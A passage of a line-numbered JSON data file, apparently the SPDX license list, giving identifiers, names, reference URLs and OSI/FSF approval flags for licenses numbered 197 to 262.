2457 "detailsUrl": "https://spdx.org/licenses/NRL.json",
2458 "referenceNumber": 197,
2459 "name": "NRL License",
2460 "licenseId": "NRL",
2461 "seeAlso": [
2462 "http://web.mit.edu/network/isakmp/nrllicense.html"
2463 ],
2464 "isOsiApproved": false
2465 },
2466 {
2467 "reference": "https://spdx.org/licenses/SWL.html",
2468 "isDeprecatedLicenseId": false,
2469 "detailsUrl": "https://spdx.org/licenses/SWL.json",
2470 "referenceNumber": 198,
2471 "name": "Scheme Widget Library (SWL) Software License Agreement",
2472 "licenseId": "SWL",
2473 "seeAlso": [
2474 "https://fedoraproject.org/wiki/Licensing/SWL"
2475 ],
2476 "isOsiApproved": false
2477 },
2478 {
2479 "reference": "https://spdx.org/licenses/Zed.html",
2480 "isDeprecatedLicenseId": false,
2481 "detailsUrl": "https://spdx.org/licenses/Zed.json",
2482 "referenceNumber": 199,
2483 "name": "Zed License",
2484 "licenseId": "Zed",
2485 "seeAlso": [
2486 "https://fedoraproject.org/wiki/Licensing/Zed"
2487 ],
2488 "isOsiApproved": false
2489 },
2490 {
2491 "reference": "https://spdx.org/licenses/CERN-OHL-1.1.html",
2492 "isDeprecatedLicenseId": false,
2493 "detailsUrl": "https://spdx.org/licenses/CERN-OHL-1.1.json",
2494 "referenceNumber": 200,
2495 "name": "CERN Open Hardware Licence v1.1",
2496 "licenseId": "CERN-OHL-1.1",
2497 "seeAlso": [
2498 "https://www.ohwr.org/project/licenses/wikis/cern-ohl-v1.1"
2499 ],
2500 "isOsiApproved": false
2501 },
2502 {
2503 "reference": "https://spdx.org/licenses/RHeCos-1.1.html",
2504 "isDeprecatedLicenseId": false,
2505 "detailsUrl": "https://spdx.org/licenses/RHeCos-1.1.json",
2506 "referenceNumber": 201,
2507 "name": "Red Hat eCos Public License v1.1",
2508 "licenseId": "RHeCos-1.1",
2509 "seeAlso": [
2510 "http://ecos.sourceware.org/old-license.html"
2511 ],
2512 "isOsiApproved": false
2513 },
2514 {
2515 "reference": "https://spdx.org/licenses/JasPer-2.0.html",
2516 "isDeprecatedLicenseId": false,
2517 "detailsUrl": "https://spdx.org/licenses/JasPer-2.0.json",
2518 "referenceNumber": 202,
2519 "name": "JasPer License",
2520 "licenseId": "JasPer-2.0",
2521 "seeAlso": [
2522 "http://www.ece.uvic.ca/~mdadams/jasper/LICENSE"
2523 ],
2524 "isOsiApproved": false
2525 },
2526 {
2527 "reference": "https://spdx.org/licenses/SSPL-1.0.html",
2528 "isDeprecatedLicenseId": false,
2529 "detailsUrl": "https://spdx.org/licenses/SSPL-1.0.json",
2530 "referenceNumber": 203,
2531 "name": "Server Side Public License, v 1",
2532 "licenseId": "SSPL-1.0",
2533 "seeAlso": [
2534 "https://www.mongodb.com/licensing/server-side-public-license"
2535 ],
2536 "isOsiApproved": false
2537 },
2538 {
2539 "reference": "https://spdx.org/licenses/GPL-2.0+.html",
2540 "isDeprecatedLicenseId": true,
2541 "detailsUrl": "https://spdx.org/licenses/GPL-2.0+.json",
2542 "referenceNumber": 204,
2543 "name": "GNU General Public License v2.0 or later",
2544 "licenseId": "GPL-2.0+",
2545 "seeAlso": [
2546 "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
2547 "https://opensource.org/licenses/GPL-2.0"
2548 ],
2549 "isOsiApproved": true
2550 },
2551 {
2552 "reference": "https://spdx.org/licenses/OLDAP-1.4.html",
2553 "isDeprecatedLicenseId": false,
2554 "detailsUrl": "https://spdx.org/licenses/OLDAP-1.4.json",
2555 "referenceNumber": 205,
2556 "name": "Open LDAP Public License v1.4",
2557 "licenseId": "OLDAP-1.4",
2558 "seeAlso": [
2559 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dc9f95c2f3f2ffb5e0ae55fe7388af75547660941"
2560 ],
2561 "isOsiApproved": false
2562 },
2563 {
2564 "reference": "https://spdx.org/licenses/libpng-2.0.html",
2565 "isDeprecatedLicenseId": false,
2566 "detailsUrl": "https://spdx.org/licenses/libpng-2.0.json",
2567 "referenceNumber": 206,
2568 "name": "PNG Reference Library version 2",
2569 "licenseId": "libpng-2.0",
2570 "seeAlso": [
2571 "http://www.libpng.org/pub/png/src/libpng-LICENSE.txt"
2572 ],
2573 "isOsiApproved": false
2574 },
2575 {
2576 "reference": "https://spdx.org/licenses/CNRI-Python-GPL-Compatible.html",
2577 "isDeprecatedLicenseId": false,
2578 "detailsUrl": "https://spdx.org/licenses/CNRI-Python-GPL-Compatible.json",
2579 "referenceNumber": 207,
2580 "name": "CNRI Python Open Source GPL Compatible License Agreement",
2581 "licenseId": "CNRI-Python-GPL-Compatible",
2582 "seeAlso": [
2583 "http://www.python.org/download/releases/1.6.1/download_win/"
2584 ],
2585 "isOsiApproved": false
2586 },
2587 {
2588 "reference": "https://spdx.org/licenses/Aladdin.html",
2589 "isDeprecatedLicenseId": false,
2590 "detailsUrl": "https://spdx.org/licenses/Aladdin.json",
2591 "referenceNumber": 208,
2592 "name": "Aladdin Free Public License",
2593 "licenseId": "Aladdin",
2594 "seeAlso": [
2595 "http://pages.cs.wisc.edu/~ghost/doc/AFPL/6.01/Public.htm"
2596 ],
2597 "isOsiApproved": false
2598 },
2599 {
2600 "reference": "https://spdx.org/licenses/CECILL-1.0.html",
2601 "isDeprecatedLicenseId": false,
2602 "detailsUrl": "https://spdx.org/licenses/CECILL-1.0.json",
2603 "referenceNumber": 209,
2604 "name": "CeCILL Free Software License Agreement v1.0",
2605 "licenseId": "CECILL-1.0",
2606 "seeAlso": [
2607 "http://www.cecill.info/licences/Licence_CeCILL_V1-fr.html"
2608 ],
2609 "isOsiApproved": false
2610 },
2611 {
2612 "reference": "https://spdx.org/licenses/Ruby.html",
2613 "isDeprecatedLicenseId": false,
2614 "detailsUrl": "https://spdx.org/licenses/Ruby.json",
2615 "referenceNumber": 210,
2616 "name": "Ruby License",
2617 "licenseId": "Ruby",
2618 "seeAlso": [
2619 "http://www.ruby-lang.org/en/LICENSE.txt"
2620 ],
2621 "isOsiApproved": false,
2622 "isFsfLibre": true
2623 },
2624 {
2625 "reference": "https://spdx.org/licenses/NPL-1.1.html",
2626 "isDeprecatedLicenseId": false,
2627 "detailsUrl": "https://spdx.org/licenses/NPL-1.1.json",
2628 "referenceNumber": 211,
2629 "name": "Netscape Public License v1.1",
2630 "licenseId": "NPL-1.1",
2631 "seeAlso": [
2632 "http://www.mozilla.org/MPL/NPL/1.1/"
2633 ],
2634 "isOsiApproved": false,
2635 "isFsfLibre": true
2636 },
2637 {
2638 "reference": "https://spdx.org/licenses/ImageMagick.html",
2639 "isDeprecatedLicenseId": false,
2640 "detailsUrl": "https://spdx.org/licenses/ImageMagick.json",
2641 "referenceNumber": 212,
2642 "name": "ImageMagick License",
2643 "licenseId": "ImageMagick",
2644 "seeAlso": [
2645 "http://www.imagemagick.org/script/license.php"
2646 ],
2647 "isOsiApproved": false
2648 },
2649 {
2650 "reference": "https://spdx.org/licenses/Cube.html",
2651 "isDeprecatedLicenseId": false,
2652 "detailsUrl": "https://spdx.org/licenses/Cube.json",
2653 "referenceNumber": 213,
2654 "name": "Cube License",
2655 "licenseId": "Cube",
2656 "seeAlso": [
2657 "https://fedoraproject.org/wiki/Licensing/Cube"
2658 ],
2659 "isOsiApproved": false
2660 },
2661 {
2662 "reference": "https://spdx.org/licenses/GFDL-1.1-only.html",
2663 "isDeprecatedLicenseId": false,
2664 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-only.json",
2665 "referenceNumber": 214,
2666 "name": "GNU Free Documentation License v1.1 only",
2667 "licenseId": "GFDL-1.1-only",
2668 "seeAlso": [
2669 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
2670 ],
2671 "isOsiApproved": false,
2672 "isFsfLibre": true
2673 },
2674 {
2675 "reference": "https://spdx.org/licenses/CC-BY-2.0.html",
2676 "isDeprecatedLicenseId": false,
2677 "detailsUrl": "https://spdx.org/licenses/CC-BY-2.0.json",
2678 "referenceNumber": 215,
2679 "name": "Creative Commons Attribution 2.0 Generic",
2680 "licenseId": "CC-BY-2.0",
2681 "seeAlso": [
2682 "https://creativecommons.org/licenses/by/2.0/legalcode"
2683 ],
2684 "isOsiApproved": false
2685 },
2686 {
2687 "reference": "https://spdx.org/licenses/AFL-1.2.html",
2688 "isDeprecatedLicenseId": false,
2689 "detailsUrl": "https://spdx.org/licenses/AFL-1.2.json",
2690 "referenceNumber": 216,
2691 "name": "Academic Free License v1.2",
2692 "licenseId": "AFL-1.2",
2693 "seeAlso": [
2694 "http://opensource.linux-mirror.org/licenses/afl-1.2.txt",
2695 "http://wayback.archive.org/web/20021204204652/http://www.opensource.org/licenses/academic.php"
2696 ],
2697 "isOsiApproved": true,
2698 "isFsfLibre": true
2699 },
2700 {
2701 "reference": "https://spdx.org/licenses/CC-BY-SA-2.0.html",
2702 "isDeprecatedLicenseId": false,
2703 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.0.json",
2704 "referenceNumber": 217,
2705 "name": "Creative Commons Attribution Share Alike 2.0 Generic",
2706 "licenseId": "CC-BY-SA-2.0",
2707 "seeAlso": [
2708 "https://creativecommons.org/licenses/by-sa/2.0/legalcode"
2709 ],
2710 "isOsiApproved": false
2711 },
2712 {
2713 "reference": "https://spdx.org/licenses/CECILL-2.0.html",
2714 "isDeprecatedLicenseId": false,
2715 "detailsUrl": "https://spdx.org/licenses/CECILL-2.0.json",
2716 "referenceNumber": 218,
2717 "name": "CeCILL Free Software License Agreement v2.0",
2718 "licenseId": "CECILL-2.0",
2719 "seeAlso": [
2720 "http://www.cecill.info/licences/Licence_CeCILL_V2-en.html"
2721 ],
2722 "isOsiApproved": false,
2723 "isFsfLibre": true
2724 },
2725 {
2726 "reference": "https://spdx.org/licenses/MIT-advertising.html",
2727 "isDeprecatedLicenseId": false,
2728 "detailsUrl": "https://spdx.org/licenses/MIT-advertising.json",
2729 "referenceNumber": 219,
2730 "name": "Enlightenment License (e16)",
2731 "licenseId": "MIT-advertising",
2732 "seeAlso": [
2733 "https://fedoraproject.org/wiki/Licensing/MIT_With_Advertising"
2734 ],
2735 "isOsiApproved": false
2736 },
2737 {
2738 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.5.html",
2739 "isDeprecatedLicenseId": false,
2740 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.5.json",
2741 "referenceNumber": 220,
2742 "name": "Creative Commons Attribution Non Commercial Share Alike 2.5 Generic",
2743 "licenseId": "CC-BY-NC-SA-2.5",
2744 "seeAlso": [
2745 "https://creativecommons.org/licenses/by-nc-sa/2.5/legalcode"
2746 ],
2747 "isOsiApproved": false
2748 },
2749 {
2750 "reference": "https://spdx.org/licenses/Artistic-1.0.html",
2751 "isDeprecatedLicenseId": false,
2752 "detailsUrl": "https://spdx.org/licenses/Artistic-1.0.json",
2753 "referenceNumber": 221,
2754 "name": "Artistic License 1.0",
2755 "licenseId": "Artistic-1.0",
2756 "seeAlso": [
2757 "https://opensource.org/licenses/Artistic-1.0"
2758 ],
2759 "isOsiApproved": true
2760 },
2761 {
2762 "reference": "https://spdx.org/licenses/OSL-3.0.html",
2763 "isDeprecatedLicenseId": false,
2764 "detailsUrl": "https://spdx.org/licenses/OSL-3.0.json",
2765 "referenceNumber": 222,
2766 "name": "Open Software License 3.0",
2767 "licenseId": "OSL-3.0",
2768 "seeAlso": [
2769 "https://web.archive.org/web/20120101081418/http://rosenlaw.com:80/OSL3.0.htm",
2770 "https://opensource.org/licenses/OSL-3.0"
2771 ],
2772 "isOsiApproved": true,
2773 "isFsfLibre": true
2774 },
2775 {
2776 "reference": "https://spdx.org/licenses/X11.html",
2777 "isDeprecatedLicenseId": false,
2778 "detailsUrl": "https://spdx.org/licenses/X11.json",
2779 "referenceNumber": 223,
2780 "name": "X11 License",
2781 "licenseId": "X11",
2782 "seeAlso": [
2783 "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3"
2784 ],
2785 "isOsiApproved": false,
2786 "isFsfLibre": true
2787 },
2788 {
2789 "reference": "https://spdx.org/licenses/Bahyph.html",
2790 "isDeprecatedLicenseId": false,
2791 "detailsUrl": "https://spdx.org/licenses/Bahyph.json",
2792 "referenceNumber": 224,
2793 "name": "Bahyph License",
2794 "licenseId": "Bahyph",
2795 "seeAlso": [
2796 "https://fedoraproject.org/wiki/Licensing/Bahyph"
2797 ],
2798 "isOsiApproved": false
2799 },
2800 {
2801 "reference": "https://spdx.org/licenses/OLDAP-2.0.1.html",
2802 "isDeprecatedLicenseId": false,
2803 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.0.1.json",
2804 "referenceNumber": 225,
2805 "name": "Open LDAP Public License v2.0.1",
2806 "licenseId": "OLDAP-2.0.1",
2807 "seeAlso": [
2808 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003db6d68acd14e51ca3aab4428bf26522aa74873f0e"
2809 ],
2810 "isOsiApproved": false
2811 },
2812 {
2813 "reference": "https://spdx.org/licenses/EUDatagrid.html",
2814 "isDeprecatedLicenseId": false,
2815 "detailsUrl": "https://spdx.org/licenses/EUDatagrid.json",
2816 "referenceNumber": 226,
2817 "name": "EU DataGrid Software License",
2818 "licenseId": "EUDatagrid",
2819 "seeAlso": [
2820 "http://eu-datagrid.web.cern.ch/eu-datagrid/license.html",
2821 "https://opensource.org/licenses/EUDatagrid"
2822 ],
2823 "isOsiApproved": true,
2824 "isFsfLibre": true
2825 },
2826 {
2827 "reference": "https://spdx.org/licenses/MTLL.html",
2828 "isDeprecatedLicenseId": false,
2829 "detailsUrl": "https://spdx.org/licenses/MTLL.json",
2830 "referenceNumber": 227,
2831 "name": "Matrix Template Library License",
2832 "licenseId": "MTLL",
2833 "seeAlso": [
2834 "https://fedoraproject.org/wiki/Licensing/Matrix_Template_Library_License"
2835 ],
2836 "isOsiApproved": false
2837 },
2838 {
2839 "reference": "https://spdx.org/licenses/GFDL-1.2-invariants-only.html",
2840 "isDeprecatedLicenseId": false,
2841 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-invariants-only.json",
2842 "referenceNumber": 228,
2843 "name": "GNU Free Documentation License v1.2 only - invariants",
2844 "licenseId": "GFDL-1.2-invariants-only",
2845 "seeAlso": [
2846 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
2847 ],
2848 "isOsiApproved": false
2849 },
2850 {
2851 "reference": "https://spdx.org/licenses/GFDL-1.3-no-invariants-or-later.html",
2852 "isDeprecatedLicenseId": false,
2853 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-no-invariants-or-later.json",
2854 "referenceNumber": 229,
2855 "name": "GNU Free Documentation License v1.3 or later - no invariants",
2856 "licenseId": "GFDL-1.3-no-invariants-or-later",
2857 "seeAlso": [
2858 "https://www.gnu.org/licenses/fdl-1.3.txt"
2859 ],
2860 "isOsiApproved": false
2861 },
2862 {
2863 "reference": "https://spdx.org/licenses/curl.html",
2864 "isDeprecatedLicenseId": false,
2865 "detailsUrl": "https://spdx.org/licenses/curl.json",
2866 "referenceNumber": 230,
2867 "name": "curl License",
2868 "licenseId": "curl",
2869 "seeAlso": [
2870 "https://github.com/bagder/curl/blob/master/COPYING"
2871 ],
2872 "isOsiApproved": false
2873 },
2874 {
2875 "reference": "https://spdx.org/licenses/LAL-1.3.html",
2876 "isDeprecatedLicenseId": false,
2877 "detailsUrl": "https://spdx.org/licenses/LAL-1.3.json",
2878 "referenceNumber": 231,
2879 "name": "Licence Art Libre 1.3",
2880 "licenseId": "LAL-1.3",
2881 "seeAlso": [
2882 "https://artlibre.org/"
2883 ],
2884 "isOsiApproved": false
2885 },
2886 {
2887 "reference": "https://spdx.org/licenses/DSDP.html",
2888 "isDeprecatedLicenseId": false,
2889 "detailsUrl": "https://spdx.org/licenses/DSDP.json",
2890 "referenceNumber": 232,
2891 "name": "DSDP License",
2892 "licenseId": "DSDP",
2893 "seeAlso": [
2894 "https://fedoraproject.org/wiki/Licensing/DSDP"
2895 ],
2896 "isOsiApproved": false
2897 },
2898 {
2899 "reference": "https://spdx.org/licenses/CERN-OHL-1.2.html",
2900 "isDeprecatedLicenseId": false,
2901 "detailsUrl": "https://spdx.org/licenses/CERN-OHL-1.2.json",
2902 "referenceNumber": 233,
2903 "name": "CERN Open Hardware Licence v1.2",
2904 "licenseId": "CERN-OHL-1.2",
2905 "seeAlso": [
2906 "https://www.ohwr.org/project/licenses/wikis/cern-ohl-v1.2"
2907 ],
2908 "isOsiApproved": false
2909 },
2910 {
2911 "reference": "https://spdx.org/licenses/TOSL.html",
2912 "isDeprecatedLicenseId": false,
2913 "detailsUrl": "https://spdx.org/licenses/TOSL.json",
2914 "referenceNumber": 234,
2915 "name": "Trusster Open Source License",
2916 "licenseId": "TOSL",
2917 "seeAlso": [
2918 "https://fedoraproject.org/wiki/Licensing/TOSL"
2919 ],
2920 "isOsiApproved": false
2921 },
2922 {
2923 "reference": "https://spdx.org/licenses/GPL-3.0-with-autoconf-exception.html",
2924 "isDeprecatedLicenseId": true,
2925 "detailsUrl": "https://spdx.org/licenses/GPL-3.0-with-autoconf-exception.json",
2926 "referenceNumber": 235,
2927 "name": "GNU General Public License v3.0 w/Autoconf exception",
2928 "licenseId": "GPL-3.0-with-autoconf-exception",
2929 "seeAlso": [
2930 "https://www.gnu.org/licenses/autoconf-exception-3.0.html"
2931 ],
2932 "isOsiApproved": false
2933 },
2934 {
2935 "reference": "https://spdx.org/licenses/CC-BY-3.0.html",
2936 "isDeprecatedLicenseId": false,
2937 "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0.json",
2938 "referenceNumber": 236,
2939 "name": "Creative Commons Attribution 3.0 Unported",
2940 "licenseId": "CC-BY-3.0",
2941 "seeAlso": [
2942 "https://creativecommons.org/licenses/by/3.0/legalcode"
2943 ],
2944 "isOsiApproved": false
2945 },
2946 {
2947 "reference": "https://spdx.org/licenses/Qhull.html",
2948 "isDeprecatedLicenseId": false,
2949 "detailsUrl": "https://spdx.org/licenses/Qhull.json",
2950 "referenceNumber": 237,
2951 "name": "Qhull License",
2952 "licenseId": "Qhull",
2953 "seeAlso": [
2954 "https://fedoraproject.org/wiki/Licensing/Qhull"
2955 ],
2956 "isOsiApproved": false
2957 },
2958 {
2959 "reference": "https://spdx.org/licenses/GFDL-1.3-no-invariants-only.html",
2960 "isDeprecatedLicenseId": false,
2961 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-no-invariants-only.json",
2962 "referenceNumber": 238,
2963 "name": "GNU Free Documentation License v1.3 only - no invariants",
2964 "licenseId": "GFDL-1.3-no-invariants-only",
2965 "seeAlso": [
2966 "https://www.gnu.org/licenses/fdl-1.3.txt"
2967 ],
2968 "isOsiApproved": false
2969 },
2970 {
2971 "reference": "https://spdx.org/licenses/TORQUE-1.1.html",
2972 "isDeprecatedLicenseId": false,
2973 "detailsUrl": "https://spdx.org/licenses/TORQUE-1.1.json",
2974 "referenceNumber": 239,
2975 "name": "TORQUE v2.5+ Software License v1.1",
2976 "licenseId": "TORQUE-1.1",
2977 "seeAlso": [
2978 "https://fedoraproject.org/wiki/Licensing/TORQUEv1.1"
2979 ],
2980 "isOsiApproved": false
2981 },
2982 {
2983 "reference": "https://spdx.org/licenses/MS-PL.html",
2984 "isDeprecatedLicenseId": false,
2985 "detailsUrl": "https://spdx.org/licenses/MS-PL.json",
2986 "referenceNumber": 240,
2987 "name": "Microsoft Public License",
2988 "licenseId": "MS-PL",
2989 "seeAlso": [
2990 "http://www.microsoft.com/opensource/licenses.mspx",
2991 "https://opensource.org/licenses/MS-PL"
2992 ],
2993 "isOsiApproved": true,
2994 "isFsfLibre": true
2995 },
2996 {
2997 "reference": "https://spdx.org/licenses/Apache-1.0.html",
2998 "isDeprecatedLicenseId": false,
2999 "detailsUrl": "https://spdx.org/licenses/Apache-1.0.json",
3000 "referenceNumber": 241,
3001 "name": "Apache License 1.0",
3002 "licenseId": "Apache-1.0",
3003 "seeAlso": [
3004 "http://www.apache.org/licenses/LICENSE-1.0"
3005 ],
3006 "isOsiApproved": false,
3007 "isFsfLibre": true
3008 },
3009 {
3010 "reference": "https://spdx.org/licenses/copyleft-next-0.3.1.html",
3011 "isDeprecatedLicenseId": false,
3012 "detailsUrl": "https://spdx.org/licenses/copyleft-next-0.3.1.json",
3013 "referenceNumber": 242,
3014 "name": "copyleft-next 0.3.1",
3015 "licenseId": "copyleft-next-0.3.1",
3016 "seeAlso": [
3017 "https://github.com/copyleft-next/copyleft-next/blob/master/Releases/copyleft-next-0.3.1"
3018 ],
3019 "isOsiApproved": false
3020 },
3021 {
3022 "reference": "https://spdx.org/licenses/GFDL-1.2-or-later.html",
3023 "isDeprecatedLicenseId": false,
3024 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-or-later.json",
3025 "referenceNumber": 243,
3026 "name": "GNU Free Documentation License v1.2 or later",
3027 "licenseId": "GFDL-1.2-or-later",
3028 "seeAlso": [
3029 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
3030 ],
3031 "isOsiApproved": false,
3032 "isFsfLibre": true
3033 },
3034 {
3035 "reference": "https://spdx.org/licenses/GPL-3.0+.html",
3036 "isDeprecatedLicenseId": true,
3037 "detailsUrl": "https://spdx.org/licenses/GPL-3.0+.json",
3038 "referenceNumber": 244,
3039 "name": "GNU General Public License v3.0 or later",
3040 "licenseId": "GPL-3.0+",
3041 "seeAlso": [
3042 "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
3043 "https://opensource.org/licenses/GPL-3.0"
3044 ],
3045 "isOsiApproved": true
3046 },
3047 {
3048 "reference": "https://spdx.org/licenses/MulanPSL-2.0.html",
3049 "isDeprecatedLicenseId": false,
3050 "detailsUrl": "https://spdx.org/licenses/MulanPSL-2.0.json",
3051 "referenceNumber": 245,
3052 "name": "Mulan Permissive Software License, Version 2",
3053 "licenseId": "MulanPSL-2.0",
3054 "seeAlso": [
3055 "https://license.coscl.org.cn/MulanPSL2/"
3056 ],
3057 "isOsiApproved": true
3058 },
3059 {
3060 "reference": "https://spdx.org/licenses/FSFAP.html",
3061 "isDeprecatedLicenseId": false,
3062 "detailsUrl": "https://spdx.org/licenses/FSFAP.json",
3063 "referenceNumber": 246,
3064 "name": "FSF All Permissive License",
3065 "licenseId": "FSFAP",
3066 "seeAlso": [
3067 "https://www.gnu.org/prep/maintain/html_node/License-Notices-for-Other-Files.html"
3068 ],
3069 "isOsiApproved": false,
3070 "isFsfLibre": true
3071 },
3072 {
3073 "reference": "https://spdx.org/licenses/Xerox.html",
3074 "isDeprecatedLicenseId": false,
3075 "detailsUrl": "https://spdx.org/licenses/Xerox.json",
3076 "referenceNumber": 247,
3077 "name": "Xerox License",
3078 "licenseId": "Xerox",
3079 "seeAlso": [
3080 "https://fedoraproject.org/wiki/Licensing/Xerox"
3081 ],
3082 "isOsiApproved": false
3083 },
3084 {
3085 "reference": "https://spdx.org/licenses/CDDL-1.0.html",
3086 "isDeprecatedLicenseId": false,
3087 "detailsUrl": "https://spdx.org/licenses/CDDL-1.0.json",
3088 "referenceNumber": 248,
3089 "name": "Common Development and Distribution License 1.0",
3090 "licenseId": "CDDL-1.0",
3091 "seeAlso": [
3092 "https://opensource.org/licenses/cddl1"
3093 ],
3094 "isOsiApproved": true,
3095 "isFsfLibre": true
3096 },
3097 {
3098 "reference": "https://spdx.org/licenses/GFDL-1.3-invariants-only.html",
3099 "isDeprecatedLicenseId": false,
3100 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-invariants-only.json",
3101 "referenceNumber": 249,
3102 "name": "GNU Free Documentation License v1.3 only - invariants",
3103 "licenseId": "GFDL-1.3-invariants-only",
3104 "seeAlso": [
3105 "https://www.gnu.org/licenses/fdl-1.3.txt"
3106 ],
3107 "isOsiApproved": false
3108 },
3109 {
3110 "reference": "https://spdx.org/licenses/etalab-2.0.html",
3111 "isDeprecatedLicenseId": false,
3112 "detailsUrl": "https://spdx.org/licenses/etalab-2.0.json",
3113 "referenceNumber": 250,
3114 "name": "Etalab Open License 2.0",
3115 "licenseId": "etalab-2.0",
3116 "seeAlso": [
3117 "https://github.com/DISIC/politique-de-contribution-open-source/blob/master/LICENSE.pdf",
3118 "https://raw.githubusercontent.com/DISIC/politique-de-contribution-open-source/master/LICENSE"
3119 ],
3120 "isOsiApproved": false
3121 },
3122 {
3123 "reference": "https://spdx.org/licenses/XFree86-1.1.html",
3124 "isDeprecatedLicenseId": false,
3125 "detailsUrl": "https://spdx.org/licenses/XFree86-1.1.json",
3126 "referenceNumber": 251,
3127 "name": "XFree86 License 1.1",
3128 "licenseId": "XFree86-1.1",
3129 "seeAlso": [
3130 "http://www.xfree86.org/current/LICENSE4.html"
3131 ],
3132 "isOsiApproved": false,
3133 "isFsfLibre": true
3134 },
3135 {
3136 "reference": "https://spdx.org/licenses/SNIA.html",
3137 "isDeprecatedLicenseId": false,
3138 "detailsUrl": "https://spdx.org/licenses/SNIA.json",
3139 "referenceNumber": 252,
3140 "name": "SNIA Public License 1.1",
3141 "licenseId": "SNIA",
3142 "seeAlso": [
3143 "https://fedoraproject.org/wiki/Licensing/SNIA_Public_License"
3144 ],
3145 "isOsiApproved": false
3146 },
3147 {
3148 "reference": "https://spdx.org/licenses/LPPL-1.1.html",
3149 "isDeprecatedLicenseId": false,
3150 "detailsUrl": "https://spdx.org/licenses/LPPL-1.1.json",
3151 "referenceNumber": 253,
3152 "name": "LaTeX Project Public License v1.1",
3153 "licenseId": "LPPL-1.1",
3154 "seeAlso": [
3155 "http://www.latex-project.org/lppl/lppl-1-1.txt"
3156 ],
3157 "isOsiApproved": false
3158 },
3159 {
3160 "reference": "https://spdx.org/licenses/CATOSL-1.1.html",
3161 "isDeprecatedLicenseId": false,
3162 "detailsUrl": "https://spdx.org/licenses/CATOSL-1.1.json",
3163 "referenceNumber": 254,
3164 "name": "Computer Associates Trusted Open Source License 1.1",
3165 "licenseId": "CATOSL-1.1",
3166 "seeAlso": [
3167 "https://opensource.org/licenses/CATOSL-1.1"
3168 ],
3169 "isOsiApproved": true
3170 },
3171 {
3172 "reference": "https://spdx.org/licenses/TU-Berlin-2.0.html",
3173 "isDeprecatedLicenseId": false,
3174 "detailsUrl": "https://spdx.org/licenses/TU-Berlin-2.0.json",
3175 "referenceNumber": 255,
3176 "name": "Technische Universitaet Berlin License 2.0",
3177 "licenseId": "TU-Berlin-2.0",
3178 "seeAlso": [
3179 "https://github.com/CorsixTH/deps/blob/fd339a9f526d1d9c9f01ccf39e438a015da50035/licences/libgsm.txt"
3180 ],
3181 "isOsiApproved": false
3182 },
3183 {
3184 "reference": "https://spdx.org/licenses/GFDL-1.3.html",
3185 "isDeprecatedLicenseId": true,
3186 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3.json",
3187 "referenceNumber": 256,
3188 "name": "GNU Free Documentation License v1.3",
3189 "licenseId": "GFDL-1.3",
3190 "seeAlso": [
3191 "https://www.gnu.org/licenses/fdl-1.3.txt"
3192 ],
3193 "isOsiApproved": false,
3194 "isFsfLibre": true
3195 },
3196 {
3197 "reference": "https://spdx.org/licenses/GFDL-1.3-or-later.html",
3198 "isDeprecatedLicenseId": false,
3199 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-or-later.json",
3200 "referenceNumber": 257,
3201 "name": "GNU Free Documentation License v1.3 or later",
3202 "licenseId": "GFDL-1.3-or-later",
3203 "seeAlso": [
3204 "https://www.gnu.org/licenses/fdl-1.3.txt"
3205 ],
3206 "isOsiApproved": false,
3207 "isFsfLibre": true
3208 },
3209 {
3210 "reference": "https://spdx.org/licenses/LAL-1.2.html",
3211 "isDeprecatedLicenseId": false,
3212 "detailsUrl": "https://spdx.org/licenses/LAL-1.2.json",
3213 "referenceNumber": 258,
3214 "name": "Licence Art Libre 1.2",
3215 "licenseId": "LAL-1.2",
3216 "seeAlso": [
3217 "http://artlibre.org/licence/lal/licence-art-libre-12/"
3218 ],
3219 "isOsiApproved": false
3220 },
3221 {
3222 "reference": "https://spdx.org/licenses/ICU.html",
3223 "isDeprecatedLicenseId": false,
3224 "detailsUrl": "https://spdx.org/licenses/ICU.json",
3225 "referenceNumber": 259,
3226 "name": "ICU License",
3227 "licenseId": "ICU",
3228 "seeAlso": [
3229 "http://source.icu-project.org/repos/icu/icu/trunk/license.html"
3230 ],
3231 "isOsiApproved": false
3232 },
3233 {
3234 "reference": "https://spdx.org/licenses/FTL.html",
3235 "isDeprecatedLicenseId": false,
3236 "detailsUrl": "https://spdx.org/licenses/FTL.json",
3237 "referenceNumber": 260,
3238 "name": "Freetype Project License",
3239 "licenseId": "FTL",
3240 "seeAlso": [
3241 "http://freetype.fis.uniroma2.it/FTL.TXT",
3242 "http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/docs/FTL.TXT",
3243 "http://gitlab.freedesktop.org/freetype/freetype/-/raw/master/docs/FTL.TXT"
3244 ],
3245 "isOsiApproved": false,
3246 "isFsfLibre": true
3247 },
3248 {
3249 "reference": "https://spdx.org/licenses/MirOS.html",
3250 "isDeprecatedLicenseId": false,
3251 "detailsUrl": "https://spdx.org/licenses/MirOS.json",
3252 "referenceNumber": 261,
3253 "name": "The MirOS Licence",
3254 "licenseId": "MirOS",
3255 "seeAlso": [
3256 "https://opensource.org/licenses/MirOS"
3257 ],
3258 "isOsiApproved": true
3259 },
3260 {
3261 "reference": "https://spdx.org/licenses/BSD-2-Clause-NetBSD.html",
3262 "isDeprecatedLicenseId": true,
3263 "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-NetBSD.json",
3264 "referenceNumber": 262,
3265 "name": "BSD 2-Clause NetBSD License",
